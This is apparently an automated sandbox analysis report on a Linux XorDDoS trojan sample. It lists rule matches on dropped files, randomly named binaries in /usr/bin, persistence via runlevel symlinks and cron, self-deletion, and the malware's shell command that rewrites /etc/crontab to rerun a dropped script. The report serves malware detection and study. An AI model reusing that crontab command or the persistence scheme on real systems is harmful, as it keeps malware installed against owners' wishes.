Source: /usr/bin/mqnpjwpasf, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/yfaogzsdtv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/yfaogzsdtv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/yfaogzsdtv, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/xaxopmwzau, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/xaxopmwzau, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/xaxopmwzau, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/vijnytmbcx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/vijnytmbcx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/vijnytmbcx, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/uruvhkrplh, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/uruvhkrplh, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/uruvhkrplh, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/ghgagimgub, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/ghgagimgub, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/ghgagimgub, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/exnwncfijy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/exnwncfijy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/exnwncfijy, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/21@16/0

Source: /tmp/eTASxT3bjO.elf (PID: 5434)

/run/gcc.pid: mecjptqjejekapeebkbmdyhaphnrwull

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc1.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc2.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc3.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc4.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc5.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc.d/rc1.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc.d/rc2.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc.d/rc3.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc.d/rc4.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/rc.d/rc5.d/S90eTASxT3bjO.elf -> /etc/init.d/eTASxT3bjO.elf	Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/cron.hourly/gcc.sh	Jump to behavior
Source: /bin/sh (PID: 5439)	File: /etc/crontab	Jump to behavior
Source: /bin/sed (PID: 5440)	File: /etc/crontab	Jump to behavior

Source: /tmp/eTASxT3bjO.elf (PID: 5439)

Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

Jump to behavior

Source: /sbin/update-rc.d (PID: 5444)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Jump to behavior

Source: /tmp/eTASxT3bjO.elf (PID: 5434)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	Reads from proc file: /proc/meminfo	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	Reads from proc file: /proc/cpuinfo	Jump to behavior

Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/lib/libudev.so	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/yfaogzsdtv	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/uruvhkrplh	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/eoogzzilvp	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/ghgagimgub	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/mqnpjwpasf	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/exnwncfijy	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/xjdcsmwtwe	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/evbjclrakz	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/xaxopmwzau	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/ygqhgbaeei	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/kffnhivjdw	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/zqylkjndwx	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/vijnytmbcx	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/svkksitypo	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File written: /usr/bin/wvicexcnqi	Jump to dropped file

Source: /tmp/eTASxT3bjO.elf (PID: 5434)

Writes shell script file to disk with an unusual file extension: /etc/init.d/eTASxT3bjO.elf

Jump to dropped file

Source: /tmp/eTASxT3bjO.elf (PID: 5434)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /etc/init.d/eTASxT3bjO.elf	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/yfaogzsdtv	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/uruvhkrplh	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/eoogzzilvp	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/ghgagimgub	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/mqnpjwpasf	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/exnwncfijy	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/xjdcsmwtwe	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/evbjclrakz	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/xaxopmwzau	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/ygqhgbaeei	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/kffnhivjdw	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/zqylkjndwx	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/vijnytmbcx	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/svkksitypo	Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/wvicexcnqi	Jump to dropped file

Sample deletes itself

Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/yfaogzsdtv	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/uruvhkrplh	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/eoogzzilvp	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/ghgagimgub	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/mqnpjwpasf	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/exnwncfijy	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/xjdcsmwtwe	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/evbjclrakz	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/xaxopmwzau	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/ygqhgbaeei	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/kffnhivjdw	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/zqylkjndwx	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/vijnytmbcx	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/svkksitypo	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/wvicexcnqi	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/glxnohbcpa	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/wircfeaxij	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/hvajrjqgqs	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/vopwilkkdb	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/bqdemabuld	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/btbrmdkijd	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	File: /usr/bin/hvcnxeaxdt	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5452)	File: /usr/bin/yfaogzsdtv	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5457)	File: /usr/bin/yfaogzsdtv	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5460)	File: /usr/bin/yfaogzsdtv	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5463)	File: /usr/bin/yfaogzsdtv	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5466)	File: /usr/bin/yfaogzsdtv	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5472)	File: /usr/bin/uruvhkrplh	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5477)	File: /usr/bin/uruvhkrplh	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5479)	File: /usr/bin/uruvhkrplh	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5483)	File: /usr/bin/uruvhkrplh	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5484)	File: /usr/bin/uruvhkrplh	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5495)	File: /usr/bin/eoogzzilvp	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5500)	File: /usr/bin/eoogzzilvp	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5503)	File: /usr/bin/eoogzzilvp	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5506)	File: /usr/bin/eoogzzilvp	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5507)	File: /usr/bin/eoogzzilvp	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5532)	File: /usr/bin/ghgagimgub	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5537)	File: /usr/bin/ghgagimgub	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5540)	File: /usr/bin/ghgagimgub	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5543)	File: /usr/bin/ghgagimgub	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5544)	File: /usr/bin/ghgagimgub	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5550)	File: /usr/bin/mqnpjwpasf	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5555)	File: /usr/bin/mqnpjwpasf	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5560)	File: /usr/bin/mqnpjwpasf	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5561)	File: /usr/bin/mqnpjwpasf	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5562)	File: /usr/bin/mqnpjwpasf	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5567)	File: /usr/bin/exnwncfijy	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5572)	File: /usr/bin/exnwncfijy	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5575)	File: /usr/bin/exnwncfijy	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5578)	File: /usr/bin/exnwncfijy	Jump to behavior
Source: /usr/bin/exnwncfijy (PID: 5579)	File: /usr/bin/exnwncfijy	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5584)	File: /usr/bin/xjdcsmwtwe	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5591)	File: /usr/bin/xjdcsmwtwe	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5595)	File: /usr/bin/xjdcsmwtwe	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5597)	File: /usr/bin/xjdcsmwtwe	Jump to behavior
Source: /usr/bin/xjdcsmwtwe (PID: 5598)	File: /usr/bin/xjdcsmwtwe	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5603)	File: /usr/bin/evbjclrakz	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5608)	File: /usr/bin/evbjclrakz	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5611)	File: /usr/bin/evbjclrakz	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5614)	File: /usr/bin/evbjclrakz	Jump to behavior
Source: /usr/bin/evbjclrakz (PID: 5615)	File: /usr/bin/evbjclrakz	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5622)	File: /usr/bin/xaxopmwzau	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5627)	File: /usr/bin/xaxopmwzau	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5629)	File: /usr/bin/xaxopmwzau	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5633)	File: /usr/bin/xaxopmwzau	Jump to behavior
Source: /usr/bin/xaxopmwzau (PID: 5634)	File: /usr/bin/xaxopmwzau	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5640)	File: /usr/bin/ygqhgbaeei	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5645)	File: /usr/bin/ygqhgbaeei	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5649)	File: /usr/bin/ygqhgbaeei	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5651)	File: /usr/bin/ygqhgbaeei	Jump to behavior
Source: /usr/bin/ygqhgbaeei (PID: 5652)	File: /usr/bin/ygqhgbaeei	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5658)	File: /usr/bin/kffnhivjdw	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5662)	File: /usr/bin/kffnhivjdw	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5665)	File: /usr/bin/kffnhivjdw	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5668)	File: /usr/bin/kffnhivjdw	Jump to behavior
Source: /usr/bin/kffnhivjdw (PID: 5669)	File: /usr/bin/kffnhivjdw	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5674)	File: /usr/bin/zqylkjndwx	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5679)	File: /usr/bin/zqylkjndwx	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5682)	File: /usr/bin/zqylkjndwx	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5685)	File: /usr/bin/zqylkjndwx	Jump to behavior
Source: /usr/bin/zqylkjndwx (PID: 5686)	File: /usr/bin/zqylkjndwx	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5693)	File: /usr/bin/vijnytmbcx	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5698)	File: /usr/bin/vijnytmbcx	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5701)	File: /usr/bin/vijnytmbcx	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5704)	File: /usr/bin/vijnytmbcx	Jump to behavior
Source: /usr/bin/vijnytmbcx (PID: 5705)	File: /usr/bin/vijnytmbcx	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5710)	File: /usr/bin/svkksitypo	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5715)	File: /usr/bin/svkksitypo	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5718)	File: /usr/bin/svkksitypo	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5721)	File: /usr/bin/svkksitypo	Jump to behavior
Source: /usr/bin/svkksitypo (PID: 5722)	File: /usr/bin/svkksitypo	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5728)	File: /usr/bin/wvicexcnqi	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5733)	File: /usr/bin/wvicexcnqi	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5736)	File: /usr/bin/wvicexcnqi	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5739)	File: /usr/bin/wvicexcnqi	Jump to behavior
Source: /usr/bin/wvicexcnqi (PID: 5740)	File: /usr/bin/wvicexcnqi	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5745)	File: /usr/bin/glxnohbcpa	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5751)	File: /usr/bin/glxnohbcpa	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5755)	File: /usr/bin/glxnohbcpa	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5756)	File: /usr/bin/glxnohbcpa	Jump to behavior
Source: /usr/bin/glxnohbcpa (PID: 5757)	File: /usr/bin/glxnohbcpa	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5762)	File: /usr/bin/wircfeaxij	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5767)	File: /usr/bin/wircfeaxij	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5771)	File: /usr/bin/wircfeaxij	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5773)	File: /usr/bin/wircfeaxij	Jump to behavior
Source: /usr/bin/wircfeaxij (PID: 5774)	File: /usr/bin/wircfeaxij	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5783)	File: /usr/bin/hvajrjqgqs	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5786)	File: /usr/bin/hvajrjqgqs	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5789)	File: /usr/bin/hvajrjqgqs	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5790)	File: /usr/bin/hvajrjqgqs	Jump to behavior
Source: /usr/bin/hvajrjqgqs (PID: 5791)	File: /usr/bin/hvajrjqgqs	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5803)	File: /usr/bin/vopwilkkdb	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5799)	File: /usr/bin/vopwilkkdb	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5806)	File: /usr/bin/vopwilkkdb	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5807)	File: /usr/bin/vopwilkkdb	Jump to behavior
Source: /usr/bin/vopwilkkdb (PID: 5808)	File: /usr/bin/vopwilkkdb	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5819)	File: /usr/bin/bqdemabuld	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5822)	File: /usr/bin/bqdemabuld	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5825)	File: /usr/bin/bqdemabuld	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5826)	File: /usr/bin/bqdemabuld	Jump to behavior
Source: /usr/bin/bqdemabuld (PID: 5827)	File: /usr/bin/bqdemabuld	Jump to behavior

Source: /tmp/eTASxT3bjO.elf (PID: 5434)	Path: /etc/cron.hourly/gcc.sh			Jump to dropped file
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	Path: /run/gcc.pid			Jump to dropped file

Source: /tmp/eTASxT3bjO.elf (PID: 5434)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /tmp/eTASxT3bjO.elf (PID: 5433)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/eTASxT3bjO.elf (PID: 5434)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5451)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5454)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5456)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5459)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/yfaogzsdtv (PID: 5462)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5471)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5474)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5476)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5480)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uruvhkrplh (PID: 5482)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5494)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5497)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5499)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5502)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eoogzzilvp (PID: 5505)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5531)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5534)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5536)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5539)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ghgagimgub (PID: 5542)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5549)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5552)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5554)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5557)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnpjwpasf (PID: 5559)	Queries kernel information via 'uname':	Jump to behavior
